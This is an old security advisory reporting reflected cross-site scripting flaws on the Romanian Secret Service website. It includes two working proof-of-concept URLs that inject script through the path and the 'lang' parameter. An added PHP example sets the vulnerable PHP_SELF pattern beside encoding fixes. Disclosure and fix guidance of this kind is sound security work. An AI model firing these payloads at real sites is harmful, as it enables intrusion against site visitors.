sriweb-xss.txt

Date: 23 May 2007 | Reported by: fl0 fl0w | Type: packetstorm | Source: packetstormsecurity.com

The Romanian Secret Service web site suffers from a cross-site scripting vulnerability. The XSS variant was found in a PHP script that uses unfiltered variables such as PHP_SELF, REQUEST_URI, SCRIPT_URL, and SCRIPT_URI.

Code
`####################################################################################  
~```````` XSS found by fl0 fl0w in sri.ro ``````~   
###############################################  
Description: The Romanian Secret Service web site suffers from cross site scripting vulnerability.  
Author: fl0 fl0w  
Homepage: http://popesculescu.lx.ro   
File Size: 5,13 KB  
  
  
site 'search' variable XSS  
Cross Site Scripting in URI  
Description :  
This XSS variant usually appears when a PHP script uses one of the following variables without filtering them:   
*PHP_SELF   
*REQUEST_URI   
*SCRIPT_URL   
*SCRIPT_URI   
##########################Proof of concept#############################  
http://sri.ro/cauta.php/%3E%22%3E%3CScRiPt%3Ealert(710%20)%3C/ScRiPt%3E  
  
This vulnerability affects /index.php  
  
http://sri.ro/index.php?nav=ani&lang=--%3E%3CScRiPt%20%0a%0d%3Ealert(710)%3B%3C/ScRiPt%3E  
  
#############  
Timeline  
#############  
discovered: 18-05-2007  
  
Find me on http://hacking.carcabot.ro --the best hacking team in RO  
  
Sh0utz : OSHO,Vladiii ,CarcaBot, Ultimatum , Virtual_x ,Canvasa ,all RENSLT memberz.  
  
fl0 fl0w 2oo7 ©   
`
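The pattern the advisory describes, next to its output-encoding fix, as an added example (not code from the advisory or from the affected site). The function names, the constructed `$server` and `$query` arrays and the `lang` allow-list are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Encode for HTML text and quoted-attribute contexts.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern: PHP_SELF includes the client-supplied path info
// (everything after "/cauta.php"), already URL-decoded by PHP.
function form_vulnerable(array $server): string
{
    return '<form action="' . $server['PHP_SELF'] . '" method="get">';
}

// Hardened: SCRIPT_NAME omits the trailing path info, and the value is
// still encoded at the point of output.
function form_hardened(array $server): string
{
    return '<form action="' . h($server['SCRIPT_NAME']) . '" method="get">';
}

// Hardened handling of a selector parameter such as "lang": accept only
// known values (hypothetical allow-list) instead of echoing the input.
function pick_lang(array $query, array $allowed = ['ro', 'en']): string
{
    $lang = $query['lang'] ?? $allowed[0];
    return in_array($lang, $allowed, true) ? $lang : $allowed[0];
}

// Constructed request data; harmless markup stands in for script content.
$server = [
    'PHP_SELF'    => '/cauta.php/"><b>injected</b>',
    'SCRIPT_NAME' => '/cauta.php',
];
$query = ['nav' => 'ani', 'lang' => '--><b>injected</b>'];

// The first line shows the attribute being closed early by the path info;
// the second and third show the same request rendered safely.
echo form_vulnerable($server), "\n";
echo form_hardened($server), "\n";
echo '<!-- lang: ', h(pick_lang($query)), " -->\n";
```

REQUEST_URI, SCRIPT_URL and SCRIPT_URI need the same treatment: pass them through `h()` wherever they are written into HTML.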
